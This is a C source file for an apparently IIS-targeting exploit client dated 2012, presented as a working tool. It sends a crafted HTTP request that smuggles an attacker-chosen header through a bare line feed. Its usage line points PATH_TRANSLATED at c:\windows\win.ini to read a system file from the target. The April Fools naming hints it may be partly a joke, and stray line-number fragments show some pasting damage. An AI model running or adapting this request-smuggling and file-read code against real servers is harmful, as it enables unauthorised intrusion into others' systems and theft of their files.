usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini

/* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
iisexp411.c ver4.1.1 copy by @yuange1975 2012.4.2

Changes in 4.1.1: 1. the input parameters were changed; 2. more of the response data is received.

假作真时真亦假。True Mingled also false.
http://weibo.com/yuange1975
http://twitter.com/yuange75
http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h> /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>
#pragma comment(lib,"ws2_32")
  24. #pragma comment(lib,"Mswsock")/*
  25. char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
  26. */
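/*
 * Request template.  The four "%s" slots are filled, in order, with the
 * request path, the Host header value, and the name and value of one
 * extra header line (see do_exp()).  Kept byte-for-byte from the original.
 */
char *AprilFoolsDay = "GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n";

/*
 * Parse a literal dotted-quad IPv4 address.
 *
 * Despite the name no DNS lookup is performed: inet_addr() only accepts
 * numeric addresses.
 *
 * name: NUL-terminated address string.
 * Returns the address in network byte order, or 0 when the string is not a
 * usable literal (INADDR_NONE and INADDR_ANY are both rejected, so 0 is
 * never returned for a valid address).
 */
static unsigned int maybe_lookup_host(const char *name)
{
    unsigned long ulAddr = inet_addr(name);

    if (ulAddr != INADDR_NONE && ulAddr != INADDR_ANY) {
        return (unsigned int)ulAddr;
    }
    return 0;
}

/*
 * Connect to hostname:port over TCP, send one request built from
 * AprilFoolsDay and copy the peer's response to stdout until the peer
 * closes the connection.
 *
 * hostname:   literal IPv4 address (also used as the Host header value).
 * port:       TCP port, host byte order.
 * AprilFools: request path.
 * c, shellcode: name and value of the extra header line.
 *
 * Returns 0 on success, -1 on an invalid address, an oversized request
 * or any socket failure (the error is printed).  The caller must have
 * called WSAStartup() successfully.
 *
 * Fixes relative to the original: the request buffer size passed to
 * sprintf_s was 0x400 for a 0x4000 buffer (long arguments tripped the CRT
 * invalid-parameter handler); a failed address parse silently connected
 * to 0.0.0.0; sockaddr_in was not zeroed; send() was not checked for
 * errors or short writes; the socket was leaked on some error paths.
 */
int do_exp(const char *hostname, unsigned int port, const char *AprilFools,
           const char *c, const char *shellcode)
{
    SOCKET sock = INVALID_SOCKET;
    struct sockaddr_in sin;
    unsigned int addr = 0;
    int write_res = 0;
    int read_res = 0;
    int sent = 0;
    int err = 0;
    char crash_buf[0x4000];
    int crash_buflen = 0;
    size_t need = 0;

    /* Validate the target before touching the network: a parse failure
     * returns 0, which would otherwise be used as the address 0.0.0.0. */
    addr = maybe_lookup_host(hostname);
    if (addr == 0) {
        printf_s("invalid target address: %s\n", hostname);
        return -1;
    }

    /* Upper bound on the formatted length (the "%s" tokens in the template
     * are counted too, so this is conservative).  Checking up front avoids
     * relying on sprintf_s's failure path, which terminates the process by
     * default when the buffer is too small. */
    need = strlen(AprilFoolsDay) + strlen(AprilFools) + strlen(hostname) +
           strlen(c) + strlen(shellcode);
    if (need >= sizeof crash_buf) {
        printf_s("request too long: needs %u bytes, buffer is %u\n",
                 (unsigned)need + 1u, (unsigned)sizeof crash_buf);
        return -1;
    }
    write_res = sprintf_s(crash_buf, sizeof crash_buf, AprilFoolsDay,
                          AprilFools, hostname, c, shellcode);
    if (write_res < 0) {
        printf_s("failed to format request\n");
        return -1;
    }
    crash_buflen = write_res;

    /* Blocking stream socket (no WSA_FLAG_OVERLAPPED). */
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET) {
        printf_s("WSASocket function failed with error = %d\n", WSAGetLastError());
        return -1;
    }

    memset(&sin, 0, sizeof sin); /* sin_zero must not be left uninitialised */
    sin.sin_family = AF_INET;
    sin.sin_port = htons((unsigned short)port);
    memcpy(&sin.sin_addr, &addr, sizeof addr);

    /* The socket is blocking, so connect() cannot report WSAEWOULDBLOCK
     * here; every SOCKET_ERROR is a real failure.  Read the error code
     * before closesocket(), which may overwrite it. */
    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        err = WSAGetLastError();
        closesocket(sock);
        printf_s("connect function failed with error: %d\n", err);
        return -1;
    }

    printf("[*] connected to %s:%u\n", hostname, port);

    /* send() may accept fewer bytes than requested; loop until the whole
     * request is out. */
    while (sent < crash_buflen) {
        write_res = send(sock, crash_buf + sent, crash_buflen - sent, 0);
        if (write_res == SOCKET_ERROR) {
            err = WSAGetLastError();
            closesocket(sock);
            printf_s("send function failed with error: %d\n", err);
            return -1;
        }
        sent += write_res;
    }
    printf("[*] send %d bytes\n\n", sent);

    /* Copy the response to stdout until the peer closes or recv() fails.
     * The peer's data is untrusted: it is written with fwrite() using the
     * byte count recv() returned, so embedded NUL bytes are not dropped and
     * it is never interpreted as a format string. */
    for (;;) {
        read_res = recv(sock, crash_buf, (int)sizeof crash_buf - 1, 0);
        if (read_res <= 0) {
            break;
        }
        fwrite(crash_buf, 1, (size_t)read_res, stdout);
    }
    fflush(stdout);

    closesocket(sock);
    return 0;
}

/*
 * Entry point.
 *
 * argv[1]: target IPv4 address (required).
 * argv[2]: request path            (default "/AprilFools'Day.php").
 * argv[3]: extra header name       (default "c").
 * argv[4]: extra header value      (default "shellcode").
 *
 * The port is fixed at 80.  Returns 0 on success, the do_exp() result on
 * failure, -1 if Winsock could not be initialised.  argc is checked before
 * argv[1] is read.
 */
int main(int argc, const char **argv)
{
    int iResult;
    const char *target_ip;
    const char *AprilFools = "/AprilFools'Day.php";
    const char *c = "c";
    const char *shellcode = "shellcode";
    WSADATA wsaData;

    if (argc < 2 || argv[1] == NULL) {
        printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
        return 0;
    }
    target_ip = argv[1];
    if (argc > 2) {
        AprilFools = argv[2];
    }
    if (argc > 3) {
        c = argv[3];
    }
    if (argc > 4) {
        shellcode = argv[4];
    }

    /* Initialize Winsock */
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        printf_s("WSAStartup failed: %d\n", iResult);
        return -1;
    }

    iResult = do_exp(target_ip, 80, AprilFools, c, shellcode);

    /* clean - win socket */
    WSACleanup();
    return iResult;
}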